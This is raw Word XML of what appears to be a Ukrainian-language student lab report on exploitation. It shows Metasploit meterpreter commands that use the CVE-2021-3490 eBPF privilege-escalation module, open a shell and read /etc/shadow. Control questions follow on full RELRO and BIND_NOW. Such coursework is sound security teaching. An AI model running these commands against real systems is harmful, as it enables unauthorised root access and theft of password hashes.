    <w:p w14:paraId="39F9AF2B" w14:textId="5C8EB479" w:rsidR="00CC0B55" w:rsidRPr="00296711" w:rsidRDefault="006B006D" w:rsidP="00CC0B55">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00296711">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00CC0B55" w:rsidRPr="00296711">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC1E7FA" w14:textId="2850C2DC" w:rsidR="00CC0B55" w:rsidRPr="00296711" w:rsidRDefault="006B006D" w:rsidP="00CC0B55">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00296711">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00CC0B55" w:rsidRPr="00296711">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BED361D" w14:textId="49438677" w:rsidR="00CC0B55" w:rsidRPr="00296711" w:rsidRDefault="00EF19AA" w:rsidP="00CC0B55">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00296711">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidR="006B006D" w:rsidRPr="00296711">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CC0B55" w:rsidRPr="00296711">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1641DDA4" w14:textId="5FEA2D23" w:rsidR="00CC0B55" w:rsidRPr="00296711" w:rsidRDefault="00EF19AA" w:rsidP="00CC0B55">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00296711">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidR="006B006D" w:rsidRPr="00296711">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CC0B55" w:rsidRPr="00296711">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cat /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E08DA7" w14:textId="675ACF3C" w:rsidR="00CC0B55" w:rsidRPr="00296711" w:rsidRDefault="00EF19AA" w:rsidP="00CC0B55">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00296711">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidR="006B006D" w:rsidRPr="00296711">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CC0B55" w:rsidRPr="00296711">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343B8FD3" w14:textId="7CA73EE5" w:rsidR="00CC0B55" w:rsidRPr="00296711" w:rsidRDefault="00CC0B55" w:rsidP="00CC0B55">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00296711">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter &gt; background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46ABC8AD" w14:textId="7EFE289C" w:rsidR="00BA61C3" w:rsidRDefault="00BA61C3" w:rsidP="00CC0B55">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7768E93F" wp14:editId="09A1E553">
            <wp:extent cx="6645910" cy="3003550"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="167494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445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0B68" w14:textId="77777777" w:rsidR="000B70E8" w:rsidRDefault="000B70E8" w:rsidP="00CC0B55"/>
    <w:p w14:paraId="3BAAF39A" w14:textId="6A3C9B44" w:rsidR="000B70E8" w:rsidRPr="00442937" w:rsidRDefault="00DE633F" w:rsidP="00CC0B55">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Оберемо</w:t>
      </w:r>
      <w:r w:rsidR="00442937">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA436B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>експлойт для ескалації привілеїв:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C12FAA" w14:textId="6154F67E" w:rsidR="000B70E8" w:rsidRPr="00C452CD" w:rsidRDefault="00C729CC" w:rsidP="000B70E8">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C452CD">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C452CD">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00E60E00" w:rsidRPr="00C452CD">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E60E00" w:rsidRPr="00C452CD">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B70E8" w:rsidRPr="00C452CD">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use cve_2021_3490_ebpf_alu32_bounds_check_lpe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27761B29" w14:textId="399B7756" w:rsidR="000B70E8" w:rsidRPr="00C452CD" w:rsidRDefault="00A16AFF" w:rsidP="000B70E8">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C452CD">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C452CD">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452CD">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C452CD">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B70E8" w:rsidRPr="00C452CD">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>set SESSION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4398FF43" w14:textId="3F10AEE0" w:rsidR="006828DC" w:rsidRDefault="00A207DA" w:rsidP="000B70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118E1B" wp14:editId="043FEC88">
            <wp:extent cx="6645910" cy="2781300"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="27404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60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496E" w14:textId="77777777" w:rsidR="002169DC" w:rsidRDefault="002169DC" w:rsidP="000B70E8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76BAA5BF" w14:textId="6857371F" w:rsidR="00976C52" w:rsidRPr="00976C52" w:rsidRDefault="00976C52" w:rsidP="000B70E8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Використаємо</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> екпло</w:t>
      </w:r>
      <w:r w:rsidR="00DC259B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>й</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidR="00880683">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (виконується за 2-3 хвилини)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDE62F0" w14:textId="64309E9A" w:rsidR="002169DC" w:rsidRPr="00F24FEB" w:rsidRDefault="002169DC" w:rsidP="000B70E8">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24FEB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F24FEB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>6 &gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F24FEB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F24FEB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78306EF6" w14:textId="58AE0AB2" w:rsidR="00EE6313" w:rsidRPr="00F24FEB" w:rsidRDefault="00A95F38" w:rsidP="000B70E8">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24FEB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter &gt;</w:t>
      </w:r>
      <w:r w:rsidR="00EE6313" w:rsidRPr="00F24FEB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005B2F1D" w:rsidRPr="00F24FEB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CA46F2" w14:textId="503EEB12" w:rsidR="006A05A4" w:rsidRPr="00F24FEB" w:rsidRDefault="006222F3" w:rsidP="006A05A4">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24FEB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidR="006A05A4" w:rsidRPr="00F24FEB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131EF217" w14:textId="0CAD9878" w:rsidR="00B84EAB" w:rsidRPr="00F24FEB" w:rsidRDefault="006222F3" w:rsidP="006A05A4">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24FEB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidR="006A05A4" w:rsidRPr="00F24FEB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cat /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CF9E51" w14:textId="24F96B6F" w:rsidR="00B84EAB" w:rsidRDefault="00C2227F" w:rsidP="006A05A4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10FB787E" wp14:editId="4600A06C">
            <wp:extent cx="6645910" cy="3322320"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="76538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3737" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId38"/>
                    <a:srcRect b="10747"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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C759" w14:textId="53B3EE9A" w:rsidR="00B84EAB" w:rsidRDefault="00B84EAB" w:rsidP="006A05A4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3908099F" w14:textId="3AF48643" w:rsidR="00A02A74" w:rsidRDefault="000E1F5F" w:rsidP="006A05A4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="133C7928" wp14:editId="50E34C57">
            <wp:extent cx="6645910" cy="903605"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="162372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6656" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId39"/>
                    <a:srcRect t="47198"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="664591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C4E5" w14:textId="39966613" w:rsidR="00CB45DF" w:rsidRDefault="00F37674" w:rsidP="006A05A4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Успішно </w:t>
      </w:r>
      <w:r w:rsidR="004F4B98">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">підвищили </w:t>
      </w:r>
      <w:r w:rsidR="005F453C">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">привілеї та прочитали файл </w:t>
      </w:r>
      <w:r w:rsidR="00A31B67" w:rsidRPr="008F2C62">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>/etc/shadow</w:t>
      </w:r>
      <w:r w:rsidR="00A31B67">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE0F3E1" w14:textId="04A4D2F8" w:rsidR="00CB45DF" w:rsidRDefault="00FC345E" w:rsidP="007D75D9">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC345E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Контрольнi питання</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282B8D11" w14:textId="39FFF9B7" w:rsidR="0013590C" w:rsidRPr="00310365" w:rsidRDefault="007D75D9" w:rsidP="00310365">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D75D9">
        <w:t>1. Чому у приклад</w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:t xml:space="preserve"> експлуатац</w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:t>ї форматного рядка у розд</w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:t>л</w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:t xml:space="preserve"> 3 не працює</w:t>
      </w:r>
      <w:r w:rsidR="0013590C" w:rsidRPr="0013590C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:t>перезапис вказ</w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:t>вник</w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:t xml:space="preserve">в </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007D75D9">
        <w:t>у .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007D75D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>got</w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>plt</w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:t xml:space="preserve">? Що таке </w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BIND</w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NOW</w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A1F329" w14:textId="7C1E85CD" w:rsidR="00E4156C" w:rsidRDefault="004A2947" w:rsidP="00310365">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>П</w:t>
      </w:r>
      <w:r w:rsidRPr="00310365">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ерезапис вказ</w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00310365">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>вник</w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00310365">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>в у .</w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>got</w:t>
      </w:r>
      <w:r w:rsidRPr="00310365">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>plt</w:t>
      </w:r>
      <w:r w:rsidR="00220B74">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00220B74" w:rsidRPr="00310365">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">не працює </w:t>
      </w:r>
      <w:r w:rsidR="00046C5F" w:rsidRPr="00310365">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>у приклад</w:t>
      </w:r>
      <w:r w:rsidR="00046C5F" w:rsidRPr="007D75D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00046C5F" w:rsidRPr="00310365">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> експлуатац</w:t>
      </w:r>
      <w:r w:rsidR="00046C5F" w:rsidRPr="007D75D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00046C5F" w:rsidRPr="00310365">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">ї форматного рядка </w:t>
      </w:r>
      <w:r w:rsidR="002C3D89">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidR="00046C5F" w:rsidRPr="00310365">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> розд</w:t>
      </w:r>
      <w:r w:rsidR="00046C5F" w:rsidRPr="007D75D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00046C5F" w:rsidRPr="00310365">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>л</w:t>
      </w:r>
      <w:r w:rsidR="00046C5F" w:rsidRPr="007D75D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00046C5F" w:rsidRPr="00310365">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
      <w:r w:rsidR="00DB0CE7">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> через те, що </w:t>
      </w:r>
      <w:r w:rsidR="002C3D89">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">при компіляції </w:t>
      </w:r>
      <w:r w:rsidR="00DB0CE7">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">використовується </w:t>
      </w:r>
      <w:r w:rsidR="00B9192B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">повне </w:t>
      </w:r>
      <w:r w:rsidR="00B9192B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RELRO</w:t>
      </w:r>
      <w:r w:rsidR="00112D62">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. А отже, </w:t>
      </w:r>
      <w:r w:rsidR="00BA4F05">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GOT</w:t>
      </w:r>
      <w:r w:rsidR="00BA4F05" w:rsidRPr="00310365">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA4F05">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00BA4F05" w:rsidRPr="00310365">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BA4F05" w:rsidRPr="007D75D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>got</w:t>
      </w:r>
      <w:r w:rsidR="00BA4F05" w:rsidRPr="00310365">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BA4F05" w:rsidRPr="007D75D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>plt</w:t>
      </w:r>
      <w:r w:rsidR="00BA4F05">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">) стає </w:t>
      </w:r>
      <w:r w:rsidR="00C31186">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>недоступною для запису</w:t>
      </w:r>
      <w:r w:rsidR="00310365">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6741F9D4" w14:textId="29380073" w:rsidR="00310365" w:rsidRDefault="00ED000E" w:rsidP="007D75D9">
      <w:pPr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BIND</w:t>
      </w:r>
      <w:r w:rsidRPr="007F519E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NOW</w:t>
      </w:r>
      <w:r w:rsidRPr="007F519E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">це </w:t>
      </w:r>
      <w:r w:rsidR="007F519E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>метод зв'язування</w:t>
      </w:r>
      <w:r w:rsidR="001C0EC5">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>, при якому</w:t>
      </w:r>
      <w:r w:rsidR="00554217">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> адреси функцій розраховуються в момент завантаження</w:t>
      </w:r>
      <w:r w:rsidR="003C5C26" w:rsidRPr="003C5C26">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C5C26">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">програми у пам'ять (в </w:t>
      </w:r>
      <w:r w:rsidR="003C5C26">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>load</w:t>
      </w:r>
      <w:r w:rsidR="003C5C26" w:rsidRPr="003C5C26">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C5C26">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
